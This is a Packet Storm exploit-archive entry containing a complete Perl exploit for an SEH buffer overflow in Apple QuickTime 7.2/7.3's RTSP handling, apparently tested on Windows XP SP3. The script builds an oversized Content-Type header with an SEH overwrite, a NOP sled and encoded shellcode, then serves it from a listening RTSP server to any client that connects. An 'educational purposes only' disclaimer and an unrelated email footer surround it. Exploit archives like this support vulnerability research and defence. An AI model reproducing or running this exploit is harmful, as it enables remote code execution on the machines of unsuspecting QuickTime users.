Apple QuickTime 7.2 / 7.3 RTSP Buffer Overflow

2010-01-07T00:00:00
ID PACKETSTORM:84868
Type packetstorm
Reporter Jacky
Modified 2010-01-07T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)  
# Date: 2009-01-06  
# Author: Jacky  
# Software Link: [downoad link if available]  
# Version: 7.2/7.3  
# Tested on: Windows XP SP3  
# CVE : [if exists]  
# Code :  
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )  
#Discovered by (Krystian Kloskowski (h07) <h07@interia.pl>)  
#Written and coded by Jacky!  
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)  
#This time i wrote the exploit in perl , because i saw that it was written  
#many times in python and ruby only !  
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!  
#!/usr/bin/perl -w  
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n  
#  
# 0x41414141 Pointer to next SEH record  
# 0x42424242 SE handler  
use strict;  
use Socket;  
my $junk="A"x991;  
my $nseh="\xeb\x06\x90\x90";  
my $seh="\x4e\x28\x86\x66"; #\x4e\x28\x86\x66  
my $nops="\x90"x20;  
my $shellcode="\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .  
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .  
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .  
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .  
"\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30" .  
"\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34" .  
"\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b" .  
"\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47" .  
"\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c" .  
"\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31" .  
"\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32" .  
"\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c" .  
"\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70" .  
"\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48" .  
"\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53" .  
"\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56" .  
"\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f" .  
"\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64" .  
"\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75" .  
"\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63" .  
"\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c" .  
"\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30" .  
"\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71" .  
"\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f" .  
"\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a" .  
"\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70" .  
"\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f" .  
"\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38" .  
"\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c" .  
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35" .  
"\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a" .  
"\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c" .  
"\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41";  
my $rest="B"x(4096-length($seh.$nops.$shellcode));  
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest;  
my $header = "RTSP/1.0 200 OK\r\n".  
"CSeq: 1\r\n".  
"Date: 0x00 :P\r\n".  
"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n".  
"Content-Type: $payload\r\n".  
"Content-Length: 334\r\n".  
"\r\n";  
my $body = "v=0\r\n".  
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n".  
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".  
"i=1.mp3\r\n".  
"t=0 0\r\n".  
"a=tool:ciamciaramcia\r\n".  
"a=type:broadcast\r\n".  
"a=control:*\r\n".  
"a=range:npt=0-213.077\r\n".  
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".  
"a=x-qt-text-inf:1.mp3\r\n".  
"m=audio 0 RTP/AVP 14\r\n".  
"c=IN IP4 0.0.0.0\r\n".  
"a=control:track1\r\n";  
my $evil=$header.$body;  
my $port=shift || 554;  
my $proto=getprotobyname('tcp');  
socket(SERVER,PF_INET,SOCK_STREAM,$proto);  
my $paddr=sockaddr_in($port,INADDR_ANY);  
bind(SERVER,$paddr);  
listen(SERVER,SOMAXCONN);  
print "[+]Listening on [RTSP]554\n";  
my $client_addr;  
while($client_addr=accept(CLIENT,SERVER))  
{  
print CLIENT $evil;  
print "[+]Connection Accepted\n";  
print "[+]Sending Evil Payload\n";  
}  
close CLIENT;  
print "[+]Connection closed\n";  
  
  
  
  
  
________________________________  
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010>  
  
  
  
`